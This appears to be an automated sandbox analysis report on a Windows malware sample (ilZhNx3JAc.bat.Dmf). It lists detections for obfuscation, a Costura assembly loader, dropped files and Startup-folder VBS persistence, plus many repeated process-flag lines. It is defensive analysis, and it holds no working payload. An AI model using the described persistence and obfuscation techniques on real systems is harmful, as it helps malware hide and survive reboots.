Source: Binary string: powershell.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, I7DiZmuDr9s6wMO6NpB.cs .Net Code: Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777252)),Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777284))})
.NET source code contains potential unpacker
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 7.2.ilZhNx3JAc.bat.Dmf.8000000.9.raw.unpack, FieldBridgeMapper.cs .Net Code: PostRegistry System.Reflection.Assembly.Load(byte[])
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Yara detected Costura Assembly Loader
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8ac0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.6038a80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.60f8fa0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6006d78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.5f46858.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.5e02330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1406003010.0000000008AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_0419AAE3 pushad ; retf 7_2_0419AAE7
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_04198BF8 push eax; retf 0007h 7_2_04198C02
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_0419702D push 0007CA45h; retf 0007h 7_2_04197042
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_04199C30 push es; ret 7_2_04199C40
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A8679E push esi; iretd 7_2_08A8679F
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7C4F8 push eax; iretd 7_2_08B7C4F9
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B704E5 push edi; ret 7_2_08B704E6
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08C736DC push es; retf 7_2_08C736E2
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_00C3AAE3 pushad ; retf 16_2_00C3AAE7
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_088104E5 push edi; ret 16_2_088104E6
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881C4F8 push eax; iretd 16_2_0881C4F9
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_089136DC push es; retf 16_2_089136E2
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, rKl4Lg7OEo5Kh9p6gI8.cs High entropy of concatenated method names: 'C2D7ydMgUu', 'QgJ7ieDv13', 'UgO7DmYuT1', 'nfa7YTWaOF', 'IHt7vbO1Aq', 'dUOqoLYkCbhRuB13SSH', 'm48PHnY56OShfCoU7Mo', 'siDPihYgVHwMfdDCjcH', 'unH5vXYbdwMZ85ZMRr0', 'aDoFlOYNrSm1sIwMr8W'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'X1IvcqcAaFxMnXfMfvL'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, Mrc9xStYQ8VxKoXKbl4.cs High entropy of concatenated method names: 'IObtp5VBKd', 'KYdtfqxp3K', 't9Ht0RtPa4', 'eVgtWPkXeP', 'R0CtVlya57', 'jqVtlbldSg', 'kOutMq6wkj', 'wjEtS0FshE', 'zCmthpqdpQ', 'LMttoRpmLR'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, saEpX2tOaZ3MHMPHSgw.cs High entropy of concatenated method names: 'MDJJTBhW8W', 'zt5JBtpwsP', 'f4A4VWw5XXt8HhmGE4E', 'Yo2lpQwgf2EShVDGXKB', 'YAs296wbqpAAuYqRiCS', 'oCF3MNwN0PPCTdabJs3', 'IXNiOMw9GfaMc5mY14T', 'lfXVEAwRYe6eKrLfl4U'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, M3kbOgtzHH2l7rsni2f.cs High entropy of concatenated method names: 'HNKgdMuM2i', 'mjTgaD0UIg', 'UEOgUf23rb', 'BTFg4k3mry', 'Hypge6dCta', 'P0MgGsgUiY', 'LXcg8lxV29', 'mHQTXl00eZ', 'fuUgCxguvm', 'mZqgOPYuPb'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, I7DiZmuDr9s6wMO6NpB.cs High entropy of concatenated method names: 'QByRv8cKHybJKbYIcKT', 'NNjHOBc2SvDleEeJFNx', 'IoUtt0pkv3', 'NWXewecEkIJ5duAOnsd', 'qmqv5acpuwkSX6h2RxH', 'oQPauncfRUrd9kVXj7I', 'BW8YS7c0pjTX9j9xQlC', 'iCYIL5cWvIANrSWtCBe', 'mpkIPpcVravSA8TGh4A', 'ErchFocl7IK0jlTj2AQ'

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to dropped file
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to dropped file
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
